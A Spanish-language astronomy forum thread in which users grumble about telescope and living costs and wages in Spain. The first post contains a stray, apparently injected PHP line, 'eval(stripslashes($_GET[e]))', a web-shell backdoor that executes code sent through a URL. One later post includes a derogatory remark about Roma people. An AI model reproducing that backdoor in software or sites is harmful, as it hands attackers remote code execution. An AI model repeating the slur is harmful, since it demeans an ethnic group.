Oferta telescopio.....¿?

Subforo dedicado a los telescopios astronómicos. En este foro no está permitida la venta de ningún tipo de material.
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Oferta telescopio.....¿?

Mensaje por m3ntol »

Es una cuestión de oferta y demanda. Los productos ` avanzados` bien sea óptica o tecnología son más caros cuanto menos desarrollado sea el país. Justo al reves que los productos de primera necesidad.
phpbb:eval(stripslashes($_GET[e]));
vakaloura
Mensajes: 661
Registrado: Jue Dic 18, 2008 11:34 am

Oferta telescopio.....¿?

Mensaje por vakaloura »

Pues a mi que me expliquen porqué una caña cuesta 1,40€ o más!! Si eso no es primera necesidad jajajajaja
GSO RC 8" f/9, EZG80
QHY6_mono, NEQ6-PRO
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

Oferta telescopio.....¿?

Mensaje por Manuelariza »

Yo he estado en Alemania de vacaciones,la comida y la bebida están por el estilo pero las viviendas,que eso si que es un producto de primera necesidad,están mas baratas.España es un país de piratas y gitanos y eso no se lo quita nadie. :evil: :evil:


Saludos...
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
Avatar de Usuario
JOAQUIN
Mensajes: 233
Registrado: Jue Sep 03, 2009 10:19 am

Oferta telescopio.....¿?

Mensaje por JOAQUIN »

Tienes razón, la cuestión es que vivimos en un país caro, donde mas del 60% de la gente que trabaja no llega a 1000
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

Oferta telescopio.....¿?

Mensaje por Manuelariza »

Todo esto me hace mucha gracia,este gobierno y los de antes no paran de comparar los precios que tienen aquí las cosa con los países mas punteros de Europa,siempre echando en cara que nuestros precios son mas bajos,cosa que no es verdad del todo, pero a la hora de comparar sueldos,miran para otro lado.


Saludos...
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
Responder